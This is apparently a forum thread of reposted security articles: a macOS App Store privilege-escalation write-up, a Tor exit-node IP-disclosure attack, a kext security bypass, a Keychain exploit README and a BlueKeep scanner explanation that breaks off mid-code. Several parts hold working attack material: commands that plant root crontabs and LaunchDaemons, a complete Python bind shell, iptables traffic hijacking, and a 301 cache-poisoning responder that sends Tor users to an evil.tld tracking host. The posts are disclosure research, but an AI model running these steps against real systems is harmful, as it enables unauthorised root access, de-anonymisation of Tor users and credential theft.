I wasn't quite happy with all the vendor responses, and also didn't like that exploitation is limited to root most of the time, so I started to think: Can we bypass root folder permissions?
Spoiler: YES, otherwise this would be a very short post.
Tools for monitoring
Before moving on, I want to mention a couple of tools that I found useful for event monitoring.
FireEye - Monitor.app
This is a procmon-like app created by FireEye; it can be downloaded from here: Monitor.app | Free Security Software | FireEye
It's quite good!
Objective-See's ProcInfo library & ProcInfoExample
This is an open source library for monitoring process creation and termination on macOS. I used the demo project of this library, called ProcInfoExample. It's a command line utility that will log every process creation, with all the related details, like arguments, signature info, etc. It will give you more information than FireEye's Monitor app. Its output looks like this:
2019-03-11 21:18:05.770 procInfoExample[32903:4117446] process start:
pid: 32906
path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update
user: 0
args: (
"/System/Library/PrivateFrameworks/PackageKit.framework/Resources/efw_cache_update",
"/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/BC005493-3176-43E4-A1F0-82D38C6431A3.activeSandbox/Root/Applications/Parcel.app"
)
ancestors: (
9103,
1
)
signing info: {
signatureAuthorities = (
"Software Signing",
"Apple Code Signing Certification Authority",
"Apple Root CA"
);
signatureIdentifier = "com.apple.efw_cache_update";
signatureSigner = 1;
signatureStatus = 0;
}
binary:
name: efw_cache_update
path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update
attributes: {
NSFileCreationDate = "2018-11-30 07:31:32 +0000";
NSFileExtensionHidden = 0;
NSFileGroupOwnerAccountID = 0;
NSFileGroupOwnerAccountName = wheel;
NSFileHFSCreatorCode = 0;
NSFileHFSTypeCode = 0;
NSFileModificationDate = "2018-11-30 07:31:32 +0000";
NSFileOwnerAccountID = 0;
NSFileOwnerAccountName = root;
NSFilePosixPermissions = 493;
NSFileReferenceCount = 1;
NSFileSize = 43040;
NSFileSystemFileNumber = 4214431;
NSFileSystemNumber = 16777220;
NSFileType = NSFileTypeRegular;
}
signing info: (null)
Built-in fs_usage utility
The fs_usage utility can monitor file system events in great detail - I would say even too much detail; you need to do some good filtering if you want to get useful data out of it. You get something like this:
(standard input):21:27:01.229709 getxattr [ 93] /Applications/Parcel.app 0.000017 lsd.4123091
(standard input):21:27:01.229719 access (___F) /Applications/Parcel.app/Contents 0.000005 lsd.4123091
(standard input):21:27:01.229819 fstatat64 [-2]//Applications/Parcel.app 0.000013 lsd.4123091
(standard input):21:27:01.229927 getattrlist /Applications/Parcel.app 0.000006 lsd.4123091
(standard input):21:27:01.229933 getattrlist /Applications/Parcel.app/Contents 0.000006 lsd.4123091
(standard input):21:27:01.229939 getattrlist /Applications/Parcel.app/Contents/MacOS 0.000005 lsd.4123091
(standard input):21:27:01.229945 getattrlist /Applications/Parcel.app/Contents/MacOS/Parcel 0.000005 lsd.4123091
(standard input):21:27:01.229957 getattrlist /Applications/Parcel.app 0.000005 lsd.4123091
Bypassing root folder permissions in App Store installed apps
The goal here is to write any file inside an App Store installed application, which by default is only writable by root. The bypass will only work if the application has already been installed at least once, since when you first get an app you need to authenticate to the App Store even if it's free (although if the user ticked 'Save Password' for free apps, you can get those as well).
What I 'noticed' first is that you can create folders in the /Applications folder - obviously, as you can also drag and drop apps there.
But what happens if I create folders for the to-be-installed app? Here is what happens, and the steps to bypass the root folder permissions:
Before you delete the app, take a note of the folder structure - you have read access to that. This is just so you know what to recreate later.
Start Launchpad, locate the app, and delete it if it's currently installed. Interestingly, it will remove the application even though you interact with Launchpad as a normal user. Note that it can only do that for apps installed from the App Store.
Create the folder structure with your regular ID in the /Applications folder; you can do that without root access. It's enough to create the folders you need (no need for all of them), and place your dylib (or whatever you want) there.
Go back to the App Store and, on the Purchased tab, locate the app and install it. You don't need to authenticate in this case. You can also use the command line utility available from Github: GitHub - mas-cli/mas: Mac App Store command line interface
At this point the app will be installed and you can use it, and you have your files there - files which you couldn't have placed there originally without root permissions. This was fixed in Mojave 10.14.5; I will talk about that later.
To compare: it's like having write access to the "Program Files" folder on Windows. Admin users do have it, but only if they run at HIGH integrity, which means you need to bypass UAC from the default MEDIUM integrity mode. But on Windows, MEDIUM integrity admin to HIGH integrity admin elevation is not a security boundary, while on macOS admin to root is a boundary.
Taking it further - Dropping AppStore files anywhere
At this point I had another idea. Since installd runs as root, can we use it to place the app, or certain parts of it, somewhere else? The answer is YES.
Let's say I want to drop the app's main mach-o file in a folder where only root has access, e.g. /opt (folders protected by SIP, like /System, won't work, as even root doesn't have access there). Here are the steps to reproduce it:
Steps 1-2 are the same as in the previous case.
3. Create the following folder structure: /Applications/Example.app/Contents
4. Create a symlink 'MacOS' pointing to /opt: ln -s /opt /Applications/Example.app/Contents/MacOS
The main mach-o file is typically in the folder /Applications/Example.app/Contents/MacOS, and now in our case we point this to /opt.
5. Install the app.
What happens at this point is that the app will install normally, except that any files under /Applications/Example.app/Contents/MacOS will go to /opt. If there was a file with the name of the mach-o file, it will be overwritten. Essentially, what we can achieve with this is to drop any file that can be found in an App Store app to a location we control.
What can't we do? (Or at least I didn't find a way.) Change the name of the file being dropped - in other words, put the contents of one file into another one with a different name. If we create a symlink for the actual mach-o file, like:
ln -s /opt/myname /Applications/Example.app/Contents/MacOS/Example
what will happen is that the symlink will be overwritten when the installd daemon moves the file from the temporary location to the final one. You can find the same behaviour if you experiment with the mv command:
$ echo aaa > a
$ ln -s a b
$ ls -la
total 8
drwxr-xr-x 4 csaby staff 128 Sep 11 16:16 .
drwxr-xr-x+ 50 csaby staff 1600 Sep 11 16:16 ..
-rw-r--r-- 1 csaby staff 4 Sep 11 16:16 a
lrwxr-xr-x 1 csaby staff 1 Sep 11 16:16 b -> a
$ cat b
aaa
$ echo bbb >> b
$ cat b
aaa
bbb
$ touch c
$ ls -l
total 8
-rw-r--r-- 1 csaby staff 8 Sep 11 16:16 a
lrwxr-xr-x 1 csaby staff 1 Sep 11 16:16 b -> a
-rw-r--r-- 1 csaby staff 0 Sep 11 16:25 c
$ mv c b
$ ls -la
total 8
drwxr-xr-x 4 csaby staff 128 Sep 11 16:25 .
drwxr-xr-x+ 50 csaby staff 1600 Sep 11 16:16 ..
-rw-r--r-- 1 csaby staff 8 Sep 11 16:16 a
-rw-r--r-- 1 csaby staff 0 Sep 11 16:25 b
Even if we create a hardlink instead of a symlink, it will be overwritten just like in the first case. As noted earlier, we can't write to folders protected by SIP.
Ideas for using this for privilege escalation
Based on the above I had the following ideas for privilege escalation from admin to root:
1. Find a file in the App Store that has the same name as a process that runs as root, and replace that file.
2. Find a file in the App Store that has a cron job line inside and is named "root"; you could drop that into /usr/lib/cron/tabs.
3. If you don't find one, you can potentially create a totally harmless app that gives you an interactive prompt, or something similar, and upload it to the App Store (it should pass Apple's vetting process, as it does nothing harmful). For example, your file could contain an example root crontab file which starts Terminal every hour. You could place that in the crontab folder.
4. Make a malicious dylib, upload it as part of an app to the App Store, and drop it there, so an app running as root will load it.
Reporting to Apple
I will admit that at this point I took the lazy approach and reported the above to Apple, mainly because:
* I found it very unlikely that I would find a suitable file that satisfies either #1 or #2
* Xcode almost satisfied #2, as it has some cron examples, but none named root
* I had zero experience in developing App Store apps, and I couldn't code in either Objective-C or Swift
* I had better things to do at work and after work
So I reported it, and at one point Apple came back regarding my privilege escalation ideas:
"The App Review process helps prevent malicious applications from becoming available on the Mac and iOS App Stores."
Obviously Apple didn't understand the problem at first - it was either my fault for not explaining it properly, or they misread it - but it was clear that there was a misunderstanding between us, so I felt that I had to prove my point if I wanted this fixed. So I took a deep breath, went the "Try Harder" approach, and decided to develop an app and submit it to the App Store.
Creating an App
After some thinking I decided that I would create an application that has a crontab file for root, which I would drop into the /usr/lib/cron/tabs folder. The app had to do something meaningful in order to be submitted and accepted, so I came up with the idea of creating a cronjob editor app. It's useful, and it would also explain why I have crontab files embedded.
Here is my journey:
Apple developer ID
In order to submit any app to the store you have to sign up for the developer program. I signed up with a new Apple ID for the Apple developer program, just because I feared they would ban me once I introduced an app that can be used for privilege escalation. In fact, they didn't. It's $99/year.
Choosing a language
I had no prior knowledge of either Objective-C or Swift, but looking at the following Objective-C syntax freaked me out:
myFraction = [[Fraction alloc] init];
This is how you call methods of objects and pass parameters.
It's against every syntax I ever knew, and I just didn't want to consume this. So I looked at Swift, which looked much nicer in this respect, and decided to go with that.
Learning Swift
My company has a subscription to one of the big online training portals, where I found a short, few-hour-long introductory course on Cocoa app development with Swift. It was an interesting course, and it turned out to be sufficient; basically it covered how to put together a simple window based GUI. It also turned out that there is Swift 1 and 2 and 3 and 4, as the language evolved, and the syntax also changed a bit over time, so you need to pick the right training.
Publishing to the store - The Process
Become an Apple Developer; it costs $99/year
Login to App Store Connect and create a Bundle ID: https://developer.apple.com/account/mac/identifier/bundle/create
Go back and create a new App referring to the Bundle ID you created: https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/ng/app
Populate the details (license page, description, etc…)
Upload your app from Xcode
Populate more details if needed
Submit for review
Publishing to the store - The error problem
Developing the app was pretty quick, but publishing it was really annoying, because I really wanted to see that my idea indeed works. So once I pushed it, I had to wait ~24 hours for it to be reviewed. I was really impatient and nervous about whether I could truly make it to the store.
The clock ticked, and it was rejected! The reason was that when I clicked the close button, the app didn't exit, and the user had no way to bring back the window. I fixed it, resubmitted, and waited another ~24 hours. Approved!
I quickly went to the store, prepared the exploit, and clicked install. Meanwhile, during development I had upgraded myself to Mojave and never really did any other tests with other apps. So it was really embarrassing to notice that on Mojave this exploit path doesn't work.
No problem, I have a High Sierra VM, let's install it there! There I got a popup that the minimum version required for the app is 10.14 (Mojave), and I can't put it on HS… damn. It's an easy fix, but that meant resubmitting again and waiting another ~24 hours. Finally it got approved again, and the exploit worked on High Sierra!
It was a really annoying process, as every time I made a small mistake, fixing it meant 24 hours, even if the actual fix in the code took 1 minute.
The App
The application I developed is called "Crontab Creator", and it is actually very useful for creating crontab files. It's still there and available, and as it turns out, there are a few people using it. Crontab Creator on the Mac App Store
The application is absolutely benign! However, it contains various examples of crontab files, which are all stored as separate files within the application. The only reason I didn't embed the strings in the source code was to be able to use them for exploitation. Among these there is one called 'root', which will try to execute a script from the /Applications/Scripts folder.
Privilege Escalation on High Sierra
The Crontab Creator app contains a file named 'root' as an example crontab file, along with 9 others. The content is the following:
* * * * * /Applications/Scripts/backup-apps.sh
Obviously this script doesn't exist by default, but you can easily create it in the /Applications folder, as you have write access, and at that point you can put anything you want into it. The steps for the privilege escalation are as follows.
First we need to create the app folder structure, and place a symlink there.
cd /Applications/
mkdir "Crontab Creator.app"
cd Crontab\ Creator.app/
mkdir Contents
cd Contents/
ln -s /usr/lib/cron/tabs/ Resources
Then we need to create the script file, which will be run every minute; I chose to run Terminal.
cd /Applications/
mkdir Scripts
cd Scripts/
echo /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal > backup-apps.sh
chmod +x backup-apps.sh
Then we need to install the application from the store. We can do this either via the GUI, or via the CLI if we install brew, and then mas. Commands:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
brew install mas
mas install 1438725196
In summary, utilizing the previous vulnerabilities, we can drop the 'root' file into the crontab folder and create the script that starts Terminal; within a minute we get a popup and root access.
The fix
As noted before, Apple fixed this exploit path in Mojave. This was in October 2018; my POC didn't work anymore, and without further testing I honestly thought that the privilege escalation issue was fixed - yes, you could still drop files inside the app, but I thought that the symlink issue was solved. I couldn't have been more wrong! But this turned out only later.
Infecting installers without breaking the Application's signature
The next part is where we want to bypass root folder permissions for manually installed apps. We can't do a true bypass / privilege escalation here, as during the installation the user has to enter his/her password, but we can still apply the previous idea. However, here I want to show another method: how to embed our custom file into an installer package. If we can MITM a pkg download, we can replace it with our own, or we can simply deliver it to the user via email or something. As a side note, interestingly, App Store apps are downloaded through HTTP; you can't really alter them, as the hash is downloaded via HTTPS and the signature is also verified.
Here are the steps to include your custom file in a valid package:
Grab an installer pkg, for example from the AppStore (Downloading installer packages from the Mac App Store with AppStoreExtract | Der Flounder)
Unpack the pkg: pkgutil --expand example.pkg myfolder
Enter the folder, and decompress the embedded Payload (inside the embedded pkg folder): tar xvf embedded.pkg/Payload
Embed your file (it can be anywhere and anything):
$ mkdir Example.app/Contents/test
$ echo aaaa > Example.app/Contents/test/a
Recompress the app: find ./Example.app | cpio -o --format odc | gzip -c > Payload
Delete unnecessary files, and move the Payload to the embedded pkg folder.
Repack the pkg: pkgutil --flatten myfolder/ mypackage.pkg
The package's digital signature will be lost, so you will need a method to bypass Gatekeeper. The embedded app's signature will also be broken, as these days every single file inside an .app bundle must be digitally signed. Typically the main mach-o file is signed, and it holds the hash of the _CodeSignature/CodeResources plist file, which in turn contains the hashes of all the other files. If you place a new file inside the .app bundle, that will invalidate the signature. However, this is not a problem here: if you can bypass Gatekeeper for the .pkg file, the installed application will not be subject to Gatekeeper's verification.
Redistributing paid apps
Using the same tool as in the previous example, we can grab the installer for a given application.
If you keep a paid app this way, it will still work somewhere else, even if that person didn't pay for the app. There is no default verification in an application of whether it was purchased or not, and it doesn't contain anything that tracks this either. With that, if you buy an application, you can easily distribute it somewhere else. In-app purchases probably won't work, as those are tied to the Apple ID, and if another activation is needed, that could also be a good countermeasure. But apps that don't have these can be easily stolen. Developers should build in some verification of Apple IDs. I'm not sure it's possible, but it would be useful for them.
Privilege escalation returns on Mojave
The fix
This year (2019) I've been talking to a few people about this, and it hit me that I never did any further checks on whether symlinks are completely broken (during the installation) or not. It turned out that they are still a thing. The way the fix works is that installd no longer has access to the crontab folder (/usr/lib/cron/tabs), even running as root, so it won't be able to create files there. I'm not even sure whether this was a direct fix for my POC or some coincidence. We can find the related error message in /var/log/install.log (you can use the Console app for viewing logs):
2019-01-31 20:44:49+01 csabymac shove[1057]: [source=file] failed _RelinkFile(/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/401FEDFC-1D7B-4E47-A6E9-E26B83F8988F.activeSandbox/Root/Applications/Crontab Creator.app/Contents/Resources/peter, /private/var/at/tabs/peter): Operation not permitted
The problem
The installd process still had access to other folders and could drop files there during the redirection, and those could be abused as well. I tested it, and you could redirect file writes to the following potentially dangerous folders:
/var/root/Library/Preferences/ - Someone could drop a file called com.apple.loginwindow.plist, which can contain a LoginHook that will run as root.
/Library/LaunchDaemons/ - Dropping a plist file here will execute as root.
/Library/StartupItems/ - Dropping a file here will also execute as root.
You can also write to /etc. Dropping files into these locations is essentially the same idea as dropping a file into the crontab folder. Potentially many other folders are also affected, so you could craft malicious dylib files, etc., but I didn't explore other options.
The 2nd POC
With that, and now being an 'experienced' macOS developer, I made a new POC, called StartUp. It's this: StartUp on the Mac App Store
It is built really along the same lines as the previous one, but in this case for LaunchDaemons. The way to utilize it is:
cd /Applications/
mkdir "StartUp.app"
cd StartUp.app/
mkdir Contents
cd Contents/
ln -s /Library/LaunchDaemons/ Resources
cd /Applications/
mkdir Scripts
cd Scripts/
Here you can create a sample.sh script that will run as root after booting up. For myself, I put a bind shell into that script; after login I connected to it and got a root shell, but it's up to you what you put there.
#sample.sh
python /Applications/Scripts/bind.py

#bind.py
#!/usr/bin/python2
"""
Python Bind TCP PTY Shell - testing version
infodox - insecurety.net (2013)
Binds a PTY to a TCP port on the host it is ran on.
""" import os import pty import socket lport = 31337 # XXX: CHANGEME def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', lport)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() if __name__ == "__main__": main() Reporting to Apple I reported this around February to Apple, and tried to explain again in very detailed why I think the entire installation process is still broken, and could be abused. The security enhancement Apple never admitted this as a security bug, they never assigned a CVE, they considered it as an enhancement. Finally this came with Mojave 10.14.5, and they even mentioned my name on their website. I made a quick test, and it turned out that they eventually managed to fix it properly. If you create the App’s folder, place there files, those will be all wiped. Using FireEye’s Monitor.app we can actually see it. The first event shows that they move the entire folder. Being in Game Of Thrones mood I imagine it like this: The following event shows that they install the application into its proper location: So you can no longer drop there your files, etc… I like the way this got fixed eventually, and I would like to thank Apple for that. I would like to also thank for Patrick Wardle who was really helpful whenever I turned to him with my n00b macOS questions. To be continued… The story goes on, as I bypassed Apple’s fix. An update will follow once they fixed the issue. Sursa: https://theevilbit.github.io/posts/getting_root_with_benign_appstore_apps/
  20. Disclosing Tor users' real IP address through 301 HTTP Redirect Cache Poisoning
Written on May 29, 2019
This blog post describes a practical application of the 'HTTP 301 Cache Poisoning' attack that can be used by a malicious Tor exit node to disclose the real IP address of chosen clients.
PoC Video
Client: Chrome Canary (76.0.3796.0)
Client real IP address: 5.60.164.177
Client tracking parameter: 6b48c94a-cf58-452c-bc50-96bace981b27
Tor exit node IP address: 51.38.150.126
Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.)
Note: In this scenario Chrome was configured, through SOCKS5 settings, to use the Tor network. The Tor circuit was set to a particular Tor test exit node: '51.38.150.126'. This is also a proof-of-concept, and many things can be further optimized…
On the malicious Tor exit node, all of the traffic is redirected to the Modlishka proxy:
iptables -t nat -A OUTPUT -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80
iptables -A FORWARD -j ACCEPT
https://vimeo.com/339586722
Example Attack Scenario Description
Assumptions:
A browser-based application (in this case a standard browser) that will connect through the Tor network and, finally, through a malicious Tor exit node.
A malicious Tor exit node that intercepts and HTTP-301-cache-poisons all of the non-TLS HTTP traffic.
Let's consider the following attack scenario steps:
The user connects to the Internet through the Tor network, either by setting the browser's settings to use the Tor SOCKS5 proxy, or system wide, where all of the OS traffic is routed through the Tor network.
The user begins a typical browsing session with his favorite browser, where usually a lot of non-TLS HTTP traffic is sent through the Tor tunnel.
The evil Tor exit node intercepts those non-TLS requests and responds to each of them with an HTTP 301 permanent redirect. These redirects will be cached permanently by the browser and will point to a tracking URL with an assigned Tor client identifier. The tracking URL can be created in the following way: http://user-identifier.evil.tld. Here 'evil.tld' will collect all source IP information and redirect clients to the originally requested hosts… or, as an alternative, to a transparent reverse proxy that will try to intercept all of the client's subsequent HTTP traffic flow. Furthermore, since it is also possible to carry out an automated cache pollution for the most popular domains (as described in the previous post), e.g. the Alexa Top 100, an attacker can maximize his chances of disclosing the real IP address.
The user, after closing the Tor session, will switch back to his usual network. As soon as the user types one of the previously poisoned entries, e.g. "google.com", into the URL address bar, the browser will use the cache and internally redirect to the tracking URL with an exit-node context identifier.
The exit node will now be able to correlate the previously intercepted HTTP request with the user's real IP address, through the information gathered on the external host behind the tracking URL with the user identifier. The evil.tld host will have information about all of the IP addresses that were used to access that tracking URL.
Obviously, this gives the Tor exit node the ability to effectively correlate chosen HTTP requests with the client's IP address: because of the poisoned cache entries, the previously generated tracking URL will be requested by the client twice - first through the Tor tunnel, and again later, after switching back to a standard ISP connection.
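To make the poisoning step concrete, here is a rough Python sketch (illustrative only, not the Modlishka code) of the kind of permanent-redirect responder a malicious exit node could run behind the iptables redirection shown above; it reuses the tracking identifier from the PoC and the evil.tld callback domain from the scenario:

import socket

TRACKING_ID = "6b48c94a-cf58-452c-bc50-96bace981b27"  # per-client identifier

# 301 responses are cached permanently; the explicit Cache-Control header
# (same value as mentioned below) reinforces the long-lived cache entry.
RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: http://%s.evil.tld/\r\n"
    "Cache-Control: max-age=31536000\r\n"
    "Content-Length: 0\r\n"
    "Connection: close\r\n\r\n" % TRACKING_ID
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", 80))
s.listen(16)
while True:
    conn, addr = s.accept()
    conn.recv(4096)                 # consume the intercepted plaintext request
    conn.sendall(RESPONSE.encode()) # poison the browser cache for this host
    conn.close()

A real implementation would generate one identifier per Tor client and per poisoned domain, and evil.tld would log the source IP of every callback.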
Another approach might rely on injecting modified JavaScript with embedded tracking URLs into the relevant non-TLS responses and setting the right cache control headers (e.g. 'Cache-Control: max-age=31536000'). However, this approach wouldn't be very effective.
Tracking users through standard cookies, set by different web applications, is also possible, but it's not easy to force the client to visit the same attacker-controlled domain twice: once while connecting through the Tor exit node, and later after switching back to the standard ISP connection.
Conclusions
The fact that it is possible to achieve a certain persistence in the browser's cache, by injecting poisoned entries, can be abused by an attacker to disclose the real IP address of Tor users that send non-TLS HTTP traffic through malicious exit nodes. Furthermore, poisoning a significant number of popular domain names will increase the likelihood of receiving a callback HTTP request (with an assigned user identifier) that will allow the user's real IP to be disclosed. An attempt can also be made to 'domain hook' some of the browser-based clients and hope that a mistyped domain name will not be noticed by the user, or will not be displayed at all (e.g. in mobile application WebViews).
Possible mitigation:
When connecting through the Tor network, ensure that all non-TLS traffic is disabled. Example browser plugins that can be used: "Firefox", "Chrome". Additionally, always use the browser's 'private' mode for browsing through Tor.
Do not route all of your OS traffic through Tor without ensuring that there is TLS traffic only…
Use the latest version of the Tor Browser whenever possible for browsing web pages.
References
https://blog.duszynski.eu/domain-hijack-through-http-301-cache-poisoning/ - "HTTP 301 Cache Poisoning Attack"
https://www.torproject.org/download/ - "Tor Browser"

Sursa: https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/
  21. How to bypass Mojave 10.14.5's new kext security
I fear that with the onset of notarization, this scenario is going to become increasingly common: you've just tried to install software which you understand includes at least one kernel extension, and which has worked fine before macOS 10.14.5 (which you're running). The install fails for no apparent reason. What do you do next?
The probable cause is that one or more of the kernel extensions haven't been notarized, and the security system in macOS has taken exception to that, refusing to install them. Of course there are a thousand and one other possible reasons, but here I'll assume it's the result of this change in security. Check first to ensure that you're not overlooking the normal security dialog, which invites you to open the Security & Privacy pane and agree to the extensions being installed there.
The only piece of information that you require is the developer ID of those kernel extensions. The simplest way to obtain this now is to open the Installer package using Suspicious Package. There, locate one of the kernel extensions, open the contextual menu, and export that whole kext (the folder with the extension .kext) to your Downloads folder.
To get the developer ID and check whether that extension has been notarized in one fell swoop, use the spctl command in the form
spctl -a -vv -t install mykext.kext
One easy way to do this is to type most of the command
spctl -a -vv -t install
then drag and drop the extension from your Downloads folder to the end of that line, where its path and name should appear, e.g.
/Users/hoakley/Downloads/VBoxDrv.kext
Then press Return, and you should see three lines of response:
mykext.kext: accepted
source=Developer ID
origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)
If the extension is notarized already, they will instead look like
mykext.kext: accepted
source=Notarized Developer ID
origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)
Make a note on paper or your iOS device of the developer ID provided in parentheses, as you'll need it in a few moments.
Close your apps down and restart your Mac in Recovery mode. There, open Terminal and type in the command
/usr/sbin/spctl kext-consent add NJ2ABCUVC1
where the code at the end is exactly the same as the developer ID which you just obtained from spctl. Press Return, wait for the command prompt to appear again, then quit Terminal and restart in normal mode.
Now when you try running the Installer package, you should find that its extensions install correctly, as you've bypassed the new kext security controls. Please let the developer know of your problems and this workaround: they need to get their kernel extensions notarized to spare other users this same rigmarole.
New spctl features and wrinkles
The man page for spctl hasn't been updated for over six years, but in 2017 it gained a set of actions to handle kernel extensions and your consent for them to be installed - what Apple terms User Approved or Secure Kernel Extension Loading. You should be able to see these if you call spctl with the -h option.
These kext-consent commands only work when you're booted in Recovery mode: they should return errors if you're running in regular mode. This appears to unblock kernel extensions which macOS won't install because they don't comply with the new rules on notarization, presumably by adding the kernel extension to the new whitelist which was installed as part of the macOS 10.14.5 update.
Kernel extensions which are correctly notarized should result in the display of the consent dialog taking the user to Security & Privacy; those which aren’t and don’t appear in the whitelist are simply blocked and not installed now. To show whether the normal system for obtaining user consent to install extensions is enabled: spctl kext-consent status To enable the normal system for obtaining user consent: spctl kext-consent enable and disable to disable, of course. To list the developer IDs which are allowed to load extensions without user consent spctl kext-consent list To add a developer ID to the list of those allowed to load kernel extensions without user consent spctl kext-consent add [devID] as used above, and remove to remove that. It is strange that this control using kext-consent works at a developer ID level, thus applies to all kernel extensions from that developer, whereas notarization is specific to an individual release of a certain code bundle from that developer. Sursa: https://eclecticlight.co/2019/06/01/how-to-bypass-mojave-10-14-5s-new-kext-security/
  22. KeySteal
KeySteal is a macOS <= 10.13.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt. KeySteal consists of two parts:
KeySteal Daemon: This is a daemon that exploits securityd to get a session that is allowed to access the Keychain without a password prompt.
KeySteal Client: This is a library that can be injected into apps. It will automatically apply a patch that forces the Security framework to use the session of our KeySteal daemon.
Building and Running
Open the KeySteal Xcode project
Build the keystealDaemon and keystealClient
Open the directory which contains the built daemon and client (right click on keystealDaemon -> Open in Finder)
Run dump-keychain.sh
TODO
Add a link to my talk about this vulnerability at Objective by the Sea
License
For most files, see LICENSE.txt. The following files were taken (or generated) from Security-58286.220.15 and are under the Apple Public Source License:
handletypes.h
ss_types.h
ucsp_types.h
ucsp.hpp
ucspUser.cpp
A copy of the Apple Public Source License can be found here.

Sursa: https://github.com/LinusHenze/Keysteal
  23. By its nature, networking code is both complex and security critical. Any data received from the network is potentially malicious and therefore needs to be handled extremely carefully. However, the multitude of different networking protocols, such as IP, IPv6, TCP, and UDP, inevitably make the networking code very complicated, thereby making it more difficult to ensure that the code is bug free. For example, many of the functions in Apple’s networking code are thousands of lines long, with a huge number of different control flow paths to handle all the possible flags and options. Over the course of 2018, I found and reported a number of RCE vulnerabilities in iOS and macOS, all related to mbuf processing in Apple’s XNU operating system kernel: CVE-2018-4249, -4259, -4286, -4287, -4288, -4291, -4407, -4460. The mbuf datatype is used by the networking code in XNU to store and process all incoming and outgoing network packets. In this talk I will explain some of the low level details of how network packets are structured, and how the mbuf datatype is used to process them in XNU. I will discuss some of the corner cases that were handled incorrectly in XNU, making the code vulnerable to remote attack. I will also talk about how I discovered each vulnerability using custom-written variant analysis with Semmle QL (http://github.com/Semmle/QL), a research technique that complements other bug-finding techniques such as fuzzing. To finish off, I will explain the C programming techniques that I used to implement PoC exploits for each of these vulnerabilities, with demonstrations of these exploits in action (crashing the kernel).
  24. Friday, May 31, 2019
Avoiding the DoS: How BlueKeep Scanners Work
Contents:
Background
RDP Channel Internals
MS_T120 I/O Completion Packets
MS_T120 Port Data Dispatch
Patch Detection
Vulnerable Host Behavior
Patched Host Behavior
CPU Architecture Differences
Conclusion
Background
On May 21, @JaGoTu and I released a proof-of-concept for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep". Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.
Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.
RDP Channel Internals
The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol. The basic premise of the vulnerability is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components and shouldn't receive arbitrary messages.
There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver. That should be enough information to follow the rest of this post. More background information is available from ZDI.
MS_T120 I/O Completion Packets
After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind. The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via an I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.
Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.
MS_T120 Port Data Dispatch
On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:
We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:
0x0 - rdpwsx!HandleConnectProviderIndication
0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose
If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.
Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.
Patch Detection
I said almost any message, because if you send a packet of the right size, you ensure that proper cleanup is performed. It's real simple: if you send an MS_T120 Disconnect Provider (0x2) message with a valid size, you get proper cleanup, and there should be no risk of denial-of-service. The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!
Vulnerable Host Behavior
On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to clean up and close the MS_T120 channel. The server then sends an MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away. And of course, with an invalid size, you RCE/BSoD.
Patched Host Behavior
However, on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice. In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.
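To make that decision logic concrete, here is a rough Python sketch (mine, not the released PoC; the handshake and channel-message helpers are placeholders for the steps described above):

import socket

def perform_rdp_handshake(sock):
    # Placeholder for the ~200-step non-NLA RDP connection sequence and the
    # out-of-bucket MS_T120 channel bind described above (see the PoC).
    raise NotImplementedError

def send_ms_t120_disconnect(sock):
    # Placeholder for the valid-size MS_T120 Disconnect Provider (0x2)
    # message, so the vulnerable code path performs proper cleanup.
    raise NotImplementedError

def check_bluekeep(host, port=3389, timeout=5.0):
    s = socket.create_connection((host, port), timeout=timeout)
    try:
        perform_rdp_handshake(s)
        send_ms_t120_disconnect(s)
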